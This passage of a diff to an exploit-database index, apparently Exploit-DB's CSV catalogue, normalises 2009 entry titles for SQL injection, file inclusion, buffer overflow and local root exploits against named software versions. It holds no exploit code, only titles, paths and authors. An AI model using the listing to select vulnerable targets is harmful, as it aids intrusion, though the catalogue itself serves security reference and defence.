Trolleur",hardware,remote,0 9499,platforms/php/webapps/9499.txt,"New5starRating 1.0 - (rating.php) SQL Injection",2009-08-24,Bgh7,php,webapps,0 9500,platforms/windows/remote/9500.cpp,"NaviCopa Web Server 3.01 - Remote Buffer Overflow Exploit",2009-08-24,SimO-s0fT,windows,remote,0 -9501,platforms/windows/local/9501.py,"Audacity <= 1.2 - (.gro) Universal BoF Exploit (egg hunter)",2009-08-24,mr_me,windows,local,0 +9501,platforms/windows/local/9501.py,"Audacity 1.2 - (.gro) Universal BoF Exploit (egg hunter)",2009-08-24,mr_me,windows,local,0 9502,platforms/php/webapps/9502.txt,"Joomla Component com_ninjamonial 1.1 - (testimID) SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0 9503,platforms/hardware/remote/9503.txt,"Huawei SmartAX MT880 - Multiple CSRF Vulnerabilities",2009-08-24,"Jerome Athias",hardware,remote,0 9504,platforms/php/webapps/9504.txt,"Joomla Component com_jtips 1.0.x - (season) bSQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0 -9505,platforms/php/webapps/9505.txt,"Geeklog <= 1.6.0sr1 - Remote Arbitrary File Upload",2009-08-24,JaL0h,php,webapps,0 +9505,platforms/php/webapps/9505.txt,"Geeklog 1.6.0sr1 - Remote Arbitrary File Upload",2009-08-24,JaL0h,php,webapps,0 9506,platforms/windows/dos/9506.pl,"FLIP Flash Album Deluxe 1.8.407.1 - (.fft) Crash PoC",2009-08-24,the_Edit0r,windows,dos,0 9507,platforms/windows/dos/9507.pl,"AiO (All into One) Flash Mixer 3 - (.afp) Crash PoC",2009-08-24,the_Edit0r,windows,dos,0 9508,platforms/windows/remote/9508.rb,"ProFTP 2.9 - (welcome message) Remote Buffer Overflow Exploit (Metasploit)",2009-08-25,His0k4,windows,remote,0 9509,platforms/windows/local/9509.pl,"Media Jukebox 8 - (.M3U) Universal Local Buffer Exploit (SEH)",2009-08-25,hack4love,windows,local,0 9510,platforms/php/webapps/9510.txt,"Joomla Component com_siirler 1.2 - (sid) SQL Injection",2009-08-25,v3n0m,php,webapps,0 -9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script - (id) Remote SQL Injection (2)",2009-08-25,Red-D3v1L,php,webapps,0 +9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script - (id) SQL Injection (2)",2009-08-25,Red-D3v1L,php,webapps,0 9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass Vulnerabilities",2009-08-25,Securitylab.ir,php,webapps,0 -9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 - AF_LLC getsockname 5-Byte Stack Disclosure Proof of Concept",2009-08-25,"Jon Oberheide",linux,local,0 +9513,platforms/linux/local/9513.c,"Linux Kernel 2.6.31-rc7 - AF_LLC getsockname 5-Byte Stack Disclosure Proof of Concept",2009-08-25,"Jon Oberheide",linux,local,0 9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre Multiple Models Denial of Service Exploit",2009-08-25,"Henri Lindberg",hardware,dos,0 9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 - (ALLO) Remote Overflow DoS Exploit (Metasploit)",2009-08-25,"Francis Provencher",windows,dos,0 9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP ActiveX Remote DoS",2009-08-25,"Francis Provencher",windows,dos,0 @@ -8984,32 +8984,32 @@ id,file,description,date,author,platform,type,port 9518,platforms/php/webapps/9518.txt,"EMO Breader Manager (video.php movie) SQL Injection",2009-08-25,Mr.SQL,php,webapps,0 9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - (.psh) Universal BoF Exploit (SEH)",2009-08-25,hack4love,windows,local,0 9520,platforms/multiple/local/9520.txt,"HyperVM File Permissions Local",2009-08-25,"Xia Shing Zee",multiple,local,0 -9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure Exploit (1)",2009-08-26,"Clément Lecigne",linux,local,0 -9522,platforms/php/webapps/9522.txt,"Moa Gallery <= 1.2.0 - Multiple Remote File Inclusion Vulnerabilities",2009-08-26,"cr4wl3r ",php,webapps,0 +9521,platforms/linux/local/9521.c,"Linux Kernel 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure Exploit (1)",2009-08-26,"Clément Lecigne",linux,local,0 +9522,platforms/php/webapps/9522.txt,"Moa Gallery 1.2.0 - Multiple Remote File Inclusion Vulnerabilities",2009-08-26,"cr4wl3r ",php,webapps,0 9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 - (index.php action) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 - (bSQL/LFI) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0 -9525,platforms/php/webapps/9525.txt,"Moa Gallery <= 1.2.0 - (p_filename) Remote File Disclosure",2009-08-26,GoLd_M,php,webapps,0 -9527,platforms/php/webapps/9527.txt,"Simple CMS FrameWork <= 1.0 - (page) Remote SQL Injection",2009-08-26,Red-D3v1L,php,webapps,0 +9525,platforms/php/webapps/9525.txt,"Moa Gallery 1.2.0 - (p_filename) Remote File Disclosure",2009-08-26,GoLd_M,php,webapps,0 +9527,platforms/php/webapps/9527.txt,"Simple CMS FrameWork 1.0 - (page) SQL Injection",2009-08-26,Red-D3v1L,php,webapps,0 9528,platforms/windows/dos/9528.py,"TFTPUtil GUI 1.3.0 - Remote Denial of Service Exploit",2009-08-26,"ThE g0bL!N",windows,dos,0 -9529,platforms/php/webapps/9529.txt,"Discuz! Plugin Crazy Star <= 2.0 - (fmid) SQL Injection",2009-08-26,ZhaoHuAn,php,webapps,0 -9530,platforms/php/webapps/9530.txt,"open auto classifieds <= 1.5.9 - Multiple Vulnerabilities",2009-08-26,"Andrew Horton",php,webapps,0 +9529,platforms/php/webapps/9529.txt,"Discuz! Plugin Crazy Star 2.0 - (fmid) SQL Injection",2009-08-26,ZhaoHuAn,php,webapps,0 +9530,platforms/php/webapps/9530.txt,"open auto classifieds 1.5.9 - Multiple Vulnerabilities",2009-08-26,"Andrew Horton",php,webapps,0 9531,platforms/php/webapps/9531.txt,"PAD Site Scripts 3.6 - (list.php string) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 -9532,platforms/php/webapps/9532.txt,"allomani 2007 - (cat) Remote SQL Injection",2009-08-26,"NeX HaCkEr",php,webapps,0 +9532,platforms/php/webapps/9532.txt,"allomani 2007 - (cat) SQL Injection",2009-08-26,"NeX HaCkEr",php,webapps,0 9533,platforms/php/webapps/9533.txt,"phpSANE 0.5.0 - (save.php) Remote File Inclusion",2009-08-26,CoBRa_21,php,webapps,0 9534,platforms/php/webapps/9534.txt,"Joomla Component com_digifolio 1.52 - (id) SQL Injection",2009-08-27,v3n0m,php,webapps,0 -9535,platforms/php/webapps/9535.txt,"Uiga Church Portal (year) Remote SQL Injection",2009-08-27,Mr.SQL,php,webapps,0 -9536,platforms/windows/local/9536.py,"PIPL <= 2.5.0 - (.m3u) Universal Buffer Overflow Exploit (SEH)",2009-08-28,mr_me,windows,local,0 +9535,platforms/php/webapps/9535.txt,"Uiga Church Portal (year) SQL Injection",2009-08-27,Mr.SQL,php,webapps,0 +9536,platforms/windows/local/9536.py,"PIPL 2.5.0 - (.m3u) Universal Buffer Overflow Exploit (SEH)",2009-08-28,mr_me,windows,local,0 9537,platforms/windows/dos/9537.htm,"Kaspersky 2010 - Remote Memory Corruption / DoS PoC",2009-08-28,"Prakhar Prasad",windows,dos,0 9538,platforms/php/webapps/9538.txt,"Silurus Classifieds System (category.php) SQL Injection",2009-08-28,Mr.SQL,php,webapps,0 -9539,platforms/windows/dos/9539.py,"uTorrent <= 1.8.3 - (Build 15772) Create New Torrent Buffer Overflow PoC",2009-08-28,Dr_IDE,windows,dos,0 -9540,platforms/windows/local/9540.py,"HTML Creator & Sender <= 2.3 build 697 - Local BoF Exploit (SEH)",2009-08-28,Dr_IDE,windows,local,0 +9539,platforms/windows/dos/9539.py,"uTorrent 1.8.3 - (Build 15772) Create New Torrent Buffer Overflow PoC",2009-08-28,Dr_IDE,windows,dos,0 +9540,platforms/windows/local/9540.py,"HTML Creator & Sender 2.3 build 697 - Local BoF Exploit (SEH)",2009-08-28,Dr_IDE,windows,local,0 9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server - Remote Stack Overflow Exploit (Windows 2000)",2009-08-31,kingcope,windows,remote,21 9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' ring0 Root Exploit (1)",2009-08-31,"INetCop Security",linux,local,0 9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit (2)",2009-08-31,"Jon Oberheide",linux,local,0 -9544,platforms/php/webapps/9544.txt,"Modern Script <= 5.0 - (index.php s) SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0 +9544,platforms/php/webapps/9544.txt,"Modern Script 5.0 - (index.php s) SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0 9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - 'sock_sendpage()' Local Root (PPC)",2009-08-31,"Ramon Valle",linux,local,0 9546,platforms/windows/dos/9546.pl,"Swift Ultralite 1.032 - (.M3U) Local Buffer Overflow PoC",2009-08-31,hack4love,windows,dos,0 -9547,platforms/windows/dos/9547.pl,"SolarWinds TFTP Server <= 9.2.0.111 - Remote DoS Exploit",2009-08-31,"Gaurav Baruah",windows,dos,0 +9547,platforms/windows/dos/9547.pl,"SolarWinds TFTP Server 9.2.0.111 - Remote DoS Exploit",2009-08-31,"Gaurav Baruah",windows,dos,0 9548,platforms/windows/local/9548.pl,"Ultimate Player 1.56b (.m3u/upl) Universal Local BoF Exploit (SEH)",2009-08-31,hack4love,windows,local,0 9549,platforms/windows/dos/9549.c,"MailEnable 1.52 - HTTP Mail Service Stack BoF Exploit PoC",2009-08-31,"fl0 fl0w",windows,dos,0 9550,platforms/windows/local/9550.txt,"Hex Workshop 4.23/5.1/6.0 - (.hex) Universal Local BoF Exploits (SEH)",2009-08-31,hack4love,windows,local,0 @@ -9021,7 +9021,7 @@ id,file,description,date,author,platform,type,port 9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a Code Execution Exploit",2009-08-31,flyh4t,php,webapps,0 9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 - FTP Server Remote Stack Overflow Exploit (Windows 2000 SP4)",2009-09-01,muts,windows,remote,21 9560,platforms/windows/local/9560.txt,"Soritong MP3 Player 1.0 - (.m3u/UI.txt) Universal Local BoF Exploits",2009-09-01,hack4love,windows,local,0 -9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter <= 2.53b330 - (.pls/.m3u) Unicode Crash PoC",2009-09-01,mr_me,windows,dos,0 +9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter 2.53b330 - (.pls/.m3u) Unicode Crash PoC",2009-09-01,mr_me,windows,dos,0 9562,platforms/asp/webapps/9562.txt,"JSFTemplating / Mojarra Scales / GlassFish - File Disclosure Vulnerabilities",2009-09-01,"SEC Consult",asp,webapps,0 9563,platforms/php/webapps/9563.txt,"Joomla Component com_artportal 1.0 - (portalid) SQL Injection Vulnerabilities",2009-09-01,"599eme Man",php,webapps,0 9564,platforms/php/webapps/9564.txt,"Joomla Component Agora 3.0.0b (com_agora) LFI",2009-09-01,ByALBAYX,php,webapps,0 @@ -9036,14 +9036,14 @@ id,file,description,date,author,platform,type,port 9573,platforms/windows/dos/9573.pl,"dTunes 2.72 - (Filename Processing) Local Format String PoC",2009-09-01,TheLeader,windows,dos,0 9574,platforms/linux/local/9574.txt,"Linux Kernel < 2.6.19 (x86/x64) - udp_sendmsg Local Root Exploit (2)",2009-09-02,spender,linux,local,0 9575,platforms/linux/local/9575.c,"Linux Kernel < 2.6.19 (Debian 4) - 'udp_sendmsg' Local Root Exploit (3)",2009-09-02,Andi,linux,local,0 -9576,platforms/php/webapps/9576.txt,"Discuz! Plugin JiangHu <= 1.1 - (id) SQL Injection",2009-09-02,ZhaoHuAn,php,webapps,0 +9576,platforms/php/webapps/9576.txt,"Discuz! Plugin JiangHu 1.1 - (id) SQL Injection",2009-09-02,ZhaoHuAn,php,webapps,0 9577,platforms/php/webapps/9577.txt,"Ve-EDIT 0.1.4 - (highlighter) Remote File Inclusion",2009-09-02,RoMaNcYxHaCkEr,php,webapps,0 -9578,platforms/php/webapps/9578.txt,"PHP Live! 3.3 - (deptid) Remote SQL Injection",2009-09-02,v3n0m,php,webapps,0 +9578,platforms/php/webapps/9578.txt,"PHP Live! 3.3 - (deptid) SQL Injection",2009-09-02,v3n0m,php,webapps,0 9579,platforms/windows/local/9579.txt,"Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal Exploit",2009-09-03,kralor,windows,local,0 9580,platforms/windows/local/9580.pl,"Hamster Audio Player 0.3a - (Associations.cfg) Local Buffer Exploit (SEH) (2)",2009-09-03,hack4love,windows,local,0 9581,platforms/windows/local/9581.pl,"SAP Player 0.9 - (.m3u) Universal Local BoF Exploit (SEH)",2009-09-03,PLATEN,windows,local,0 -9582,platforms/php/webapps/9582.txt,"FreeSchool <= 1.1.0 - Multiple Remote File Inclusion Vulnerabilities",2009-09-03,"cr4wl3r ",php,webapps,0 -9583,platforms/php/webapps/9583.txt,"PHPope <= 1.0.0 - Multiple Remote File Inclusion Vulnerabilities",2009-09-03,"cr4wl3r ",php,webapps,0 +9582,platforms/php/webapps/9582.txt,"FreeSchool 1.1.0 - Multiple Remote File Inclusion Vulnerabilities",2009-09-03,"cr4wl3r ",php,webapps,0 +9583,platforms/php/webapps/9583.txt,"PHPope 1.0.0 - Multiple Remote File Inclusion Vulnerabilities",2009-09-03,"cr4wl3r ",php,webapps,0 9584,platforms/windows/dos/9584.txt,"PPstream 2.6.86.8900 PPSMediaList ActiveX Remote BoF PoC (1)",2009-09-03,"expose 0day",windows,dos,0 9585,platforms/windows/dos/9585.txt,"PPstream 2.6.86.8900 PPSMediaList ActiveX Remote BoF PoC (2)",2009-09-03,"expose 0day",windows,dos,0 9586,platforms/windows/remote/9586.py,"SIDVault 2.0e Windows Remote Buffer Overflow Exploit",2009-09-03,blake,windows,remote,389 @@ -9060,40 +9060,40 @@ id,file,description,date,author,platform,type,port 9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service Exploit",2009-09-09,karak0rsan,windows,dos,0 9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (2)",2009-09-09,"Ramon Valle",linux,local,0 9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 - Arbitrary File Upload",2009-09-09,Securitylab.ir,php,webapps,0 -9600,platforms/php/webapps/9600.txt,"OBOphiX <= 2.7.0 - (fonctions_racine.php) Remote File Inclusion",2009-09-09,"EA Ngel",php,webapps,0 +9600,platforms/php/webapps/9600.txt,"OBOphiX 2.7.0 - (fonctions_racine.php) Remote File Inclusion",2009-09-09,"EA Ngel",php,webapps,0 9601,platforms/php/webapps/9601.php,"Joomla Component BF Survey Pro Free SQL Injection Exploit",2009-09-09,jdc,php,webapps,0 9602,platforms/php/webapps/9602.pl,"Joomla Component TPDugg 1.1 - Blind SQL Injection Exploit",2009-09-09,NoGe,php,webapps,0 9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro (user_id) SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0 9604,platforms/php/webapps/9604.txt,"Joomla Component com_joomloc (id) SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0 -9605,platforms/php/webapps/9605.pl,"Agoko CMS <= 0.4 - Remote Command Execution Exploit",2009-09-09,StAkeR,php,webapps,0 +9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution Exploit",2009-09-09,StAkeR,php,webapps,0 9606,platforms/windows/dos/9606.pl,"Safari 3.2.3 - (Win32) JavaScript (eval) Remote DoS Exploit",2009-09-09,"Jeremy Brown",windows,dos,0 9607,platforms/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional Remote Format String PoC",2009-09-09,"Jeremy Brown",windows,dos,0 9608,platforms/linux/local/9608.c,"GemStone/S 6.3.1 - (stoned) Local Buffer Overflow Exploit",2009-09-09,"Jeremy Brown",linux,local,0 -9609,platforms/php/webapps/9609.txt,"Mambo Component com_hestar Remote SQL Injection",2009-09-09,M3NW5,php,webapps,0 +9609,platforms/php/webapps/9609.txt,"Mambo Component com_hestar SQL Injection",2009-09-09,M3NW5,php,webapps,0 9610,platforms/windows/local/9610.py,"Audio Lib Player (.m3u) Buffer Overflow Exploit (SEH)",2009-09-09,blake,windows,local,0 9611,platforms/php/webapps/9611.txt,"phpNagios 1.2.0 - (menu.php) Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0 9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - (cacheId) Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0 9613,platforms/windows/remote/9613.py,"FTPShell Client 4.1 RC2 - Remote Buffer Overflow Exploit (univ)",2009-09-09,His0k4,windows,remote,0 -9615,platforms/windows/remote/9615.jar,"Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit",2009-09-09,"Pierre Nogues",windows,remote,0 +9615,platforms/windows/remote/9615.jar,"Pidgin MSN 2.5.8 - Remote Code Execution Exploit",2009-09-09,"Pierre Nogues",windows,remote,0 9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow & Null pointer Dereference Vulnerabilities",2009-09-09,"Core Security",windows,dos,0 9618,platforms/windows/local/9618.php,"Millenium MP3 Studio - (pls/mpf/m3u) Local Universal BoF Exploits (SEH)",2009-09-09,hack4love,windows,local,0 9619,platforms/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus vx(asx/wax/wvx) Universal Local BoF (SEH)",2009-09-09,hack4love,windows,local,0 9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 - (.mid) Integer Overflow PoC",2009-09-09,PLATEN,windows,dos,0 9621,platforms/windows/dos/9621.txt,"Kolibri+ Webserver 2 - (Get Request) Denial of Service",2009-09-10,"Usman Saeed",windows,dos,0 9622,platforms/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 - (LIST command) Format String DoS Exploit",2009-09-10,corelanc0d3r,windows,dos,0 -9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple RFI Vulnerabilities",2009-09-10,Kurd-Team,php,webapps,0 +9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple Remote File Inclusion Vulnerabilities",2009-09-10,Kurd-Team,php,webapps,0 9624,platforms/windows/local/9624.py,"KSP 2009R2 - (m3u) Universal Local Buffer Overflow Exploit (SEH)",2009-09-10,hack4love,windows,local,0 9625,platforms/php/webapps/9625.txt,"nullam blog 0.1.2 - (LFI/fd/SQL/XSS) Multiple Vulnerabilities",2009-09-10,"Salvatore Fresta",php,webapps,0 -9626,platforms/windows/dos/9626.py,"INMATRIX Zoom Player Pro <= 6.0.0 - (.MID) Integer Overflow PoC",2009-09-10,Dr_IDE,windows,dos,0 +9626,platforms/windows/dos/9626.py,"INMATRIX Zoom Player Pro 6.0.0 - (.MID) Integer Overflow PoC",2009-09-10,Dr_IDE,windows,dos,0 9627,platforms/linux/local/9627.txt,"Enlightenment - Linux Null PTR Dereference Exploit Framework",2009-09-10,spender,linux,local,0 9628,platforms/windows/local/9628.pl,"Icarus 2.0 - (.pgn) Universal Local Buffer Overflow Exploit (SEH)",2009-09-10,germaya_x,windows,local,0 9629,platforms/php/webapps/9629.txt,"Graffiti CMS 1.x - Arbitrary File Upload",2009-09-10,"Alexander Concha",php,webapps,0 9630,platforms/php/webapps/9630.txt,"MYRE Holiday Rental Manager (action) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 -9631,platforms/php/webapps/9631.txt,"iDesk (download.php cat_id) Remote SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 +9631,platforms/php/webapps/9631.txt,"iDesk (download.php cat_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9632,platforms/php/webapps/9632.txt,"Accommodation Hotel Booking Portal - (hotel_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 -9633,platforms/php/webapps/9633.txt,"Bus Script (sitetext_id) Remote SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 -9634,platforms/php/webapps/9634.txt,"Adult Portal escort listing (user_id) Remote SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 -9635,platforms/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - (admin_news_bot.php) RFI",2009-09-10,"EA Ngel",php,webapps,0 +9633,platforms/php/webapps/9633.txt,"Bus Script (sitetext_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 +9634,platforms/php/webapps/9634.txt,"Adult Portal escort listing (user_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 +9635,platforms/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - (admin_news_bot.php) Remote File Inclusion",2009-09-10,"EA Ngel",php,webapps,0 9636,platforms/php/webapps/9636.txt,"An image gallery 1.0 - (navigation.php) Local Directory Traversal",2009-09-10,"ThE g0bL!N",php,webapps,0 9637,platforms/php/webapps/9637.txt,"T-HTB Manager 0.5 - Multiple Blind SQL Injection Vulnerabilities",2009-09-10,"Salvatore Fresta",php,webapps,0 9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 - Remote Source Code Disclosure",2009-09-11,SkuLL-HackeR,windows,remote,0 @@ -9105,7 +9105,7 @@ id,file,description,date,author,platform,type,port 9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 - (GET Request) Remote SEH Overwrite Exploit",2009-09-11,blake,windows,remote,80 9645,platforms/aix/local/9645.sh,"IBM AIX 5.6/6.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug",2009-09-11,"Marco Ivaldi",aix,local,0 9646,platforms/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN Remote Reboot Exploit",2009-09-11,crashbrz,hardware,dos,0 -9647,platforms/php/webapps/9647.txt,"PHP-IPNMonitor (maincat_id) Remote SQL Injection",2009-09-11,noname,php,webapps,0 +9647,platforms/php/webapps/9647.txt,"PHP-IPNMonitor (maincat_id) SQL Injection",2009-09-11,noname,php,webapps,0 9648,platforms/php/webapps/9648.txt,"Joomla Hotel Booking System - (XSS/SQL Injection) Multiple Vulnerabilities",2009-09-11,K-159,php,webapps,0 9649,platforms/windows/remote/9649.txt,"Xerver HTTP Server 4.32 - Arbitrary Source Code Disclosure",2009-09-11,Dr_IDE,windows,remote,0 9650,platforms/windows/remote/9650.txt,"Kolibri+ Web Server 2 - Remote Arbitrary Source Code Disclosure (2)",2009-09-11,Dr_IDE,windows,remote,0 @@ -9120,14 +9120,14 @@ id,file,description,date,author,platform,type,port 9659,platforms/windows/local/9659.cpp,"Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow PoC",2009-09-14,"fl0 fl0w",windows,local,0 9660,platforms/windows/remote/9660.pl,"Techlogica HTTP Server 1.03 - Arbitrary File Disclosure Exploit",2009-09-14,"ThE g0bL!N",windows,remote,0 9661,platforms/windows/local/9661.c,"MP3 Studio 1.0 - (.m3u) Local Buffer Overflow Exploit",2009-09-14,dmc,windows,local,0 -9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server <= 9.20 - Remote Buffer Overflow Exploit",2009-09-14,dmc,windows,remote,143 +9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow Exploit",2009-09-14,dmc,windows,remote,143 9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 UTF-8 URL Remote Buffer Overflow Exploit",2009-09-14,dmc,windows,remote,0 9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - Remote Denial of Service Exploit (Auth)",2009-09-14,PLATEN,windows,dos,0 9665,platforms/php/webapps/9665.pl,"PHP Pro Bid Remote Blind SQL Injection Exploit",2009-09-14,NoGe,php,webapps,0 9666,platforms/hardware/dos/9666.php,"Apple Safari IPhone (using tel:) Remote Crash Exploit",2009-09-14,cloud,hardware,dos,0 9667,platforms/windows/dos/9667.c,"Cerberus FTP Server 3.0.3 - Remote Denial of Service Exploit",2009-09-14,"Single Eye",windows,dos,0 9668,platforms/windows/dos/9668.txt,"Batch Picture Watemark 1.0 - (.jpg) Local Crash PoC",2009-09-14,the_Edit0r,windows,dos,0 -9669,platforms/php/webapps/9669.txt,"Bs Counter 2.5.3 - (page) Remote SQL Injection",2009-09-14,Bgh7,php,webapps,0 +9669,platforms/php/webapps/9669.txt,"Bs Counter 2.5.3 - (page) SQL Injection",2009-09-14,Bgh7,php,webapps,0 9670,platforms/windows/dos/9670.txt,"FotoTagger 2.12.0.0 - (.XML) Buffer Overflow PoC",2009-09-14,the_Edit0r,windows,dos,0 9671,platforms/windows/dos/9671.py,"Tuniac 090517c - (.pls) Local Crash PoC",2009-09-14,zAx,windows,dos,0 9672,platforms/windows/dos/9672.py,"PowerISO 4.0 - Local Buffer Overflow PoC",2009-09-14,Dr_IDE,windows,dos,0 @@ -9137,7 +9137,7 @@ id,file,description,date,author,platform,type,port 9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 - /Scripts Access Restriction Bypass",2009-09-15,"Usman Saeed",windows,remote,0 9677,platforms/windows/dos/9677.c,"HERO SUPER PLAYER 3000 - (.m3u) Buffer Overflow PoC",2009-09-15,"fl0 fl0w",windows,dos,0 9680,platforms/windows/local/9680.txt,"Protector Plus Antivirus 8/9 - Local Privilege Escalation",2009-09-15,"Maxim A. Kulakov",windows,local,0 -9681,platforms/php/webapps/9681.txt,"efront <= 3.5.4 - (database.php path) Remote File Inclusion",2009-09-15,"cr4wl3r ",php,webapps,0 +9681,platforms/php/webapps/9681.txt,"efront 3.5.4 - (database.php path) Remote File Inclusion",2009-09-15,"cr4wl3r ",php,webapps,0 9682,platforms/windows/dos/9682.txt,"Adobe ShockWave Player 11.5.1.601 - ActiveX Buffer Overflow PoC",2009-09-15,"Francis Provencher",windows,dos,0 9683,platforms/windows/dos/9683.txt,"Novell Groupwise Client 7.0.3.1294 - ActiveX Denial of Service PoC",2009-09-15,"Francis Provencher",windows,dos,0 9684,platforms/windows/dos/9684.txt,"EasyMail Quicksoft 6.0.2.0 - ActiveX Remote Code Execution PoC",2009-09-15,"Francis Provencher",windows,dos,0 @@ -9152,28 +9152,28 @@ id,file,description,date,author,platform,type,port 9693,platforms/php/webapps/9693.txt,"Joomla Component com_djcatalog - SQL/bSQL Injection Vulnerabilities",2009-09-15,"Chip d3 bi0s",php,webapps,0 9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 - Remote Source Code Disclosure",2009-09-16,Dr_IDE,windows,remote,0 9695,platforms/windows/dos/9695.py,"BigAnt Server 2.50 SP1 - (.ZIP) Local Buffer Overflow PoC",2009-09-16,Dr_IDE,windows,dos,0 -9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 - (Auth Bypass) Remote SQL Injection",2009-09-16,snakespc,php,webapps,0 +9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 - (Auth Bypass) SQL Injection",2009-09-16,snakespc,php,webapps,0 9697,platforms/php/webapps/9697.txt,"Joomla com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0 9698,platforms/php/webapps/9698.pl,"Joomla Component com_jlord_rss (id) Blind SQL Injection Exploit",2009-09-16,"Chip d3 bi0s",php,webapps,0 9699,platforms/php/webapps/9699.txt,"microcms 3.5 - (SQL/LFI) Multiple Vulnerabilities",2009-09-16,"learn3r hacker",php,webapps,0 9700,platforms/php/webapps/9700.rb,"Saphplesson 4.3 - Remote Blind SQL Injection Exploit",2009-09-16,"Jafer Al Zidjali",php,webapps,0 9701,platforms/windows/dos/9701.c,"Notepad++ 5.4.5 - Local .C/CPP Stack Buffer Overflow PoC (0Day)",2009-09-16,"fl0 fl0w",windows,dos,0 9702,platforms/php/webapps/9702.txt,"Elite Gaming Ladders 3.2 - (platform) SQL Injection",2009-09-16,snakespc,php,webapps,0 -9703,platforms/php/webapps/9703.txt,"phpPollScript <= 1.3 - (include_class) Remote File Inclusion",2009-09-16,"cr4wl3r ",php,webapps,0 +9703,platforms/php/webapps/9703.txt,"phpPollScript 1.3 - (include_class) Remote File Inclusion",2009-09-16,"cr4wl3r ",php,webapps,0 9704,platforms/windows/remote/9704.html,"Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX BoF Exploit",2009-09-17,"Sebastian Wolfgarten",windows,remote,0 9705,platforms/windows/remote/9705.html,"Quiksoft EasyMail 6 - (AddAttachment) Remote Buffer Overflow Exploit",2009-09-17,bmgsec,windows,remote,0 9706,platforms/php/webapps/9706.txt,"joomla component com_album 1.14 - Directory Traversal",2009-09-17,DreamTurk,php,webapps,0 9707,platforms/windows/dos/9707.pl,"Ease Audio Cutter 1.20 - (.wav) Local Crash PoC",2009-09-17,zAx,windows,dos,0 -9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b - (pageHeader.php path) RFI",2009-09-17,"EA Ngel",php,webapps,0 +9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b - (pageHeader.php path) Remote File 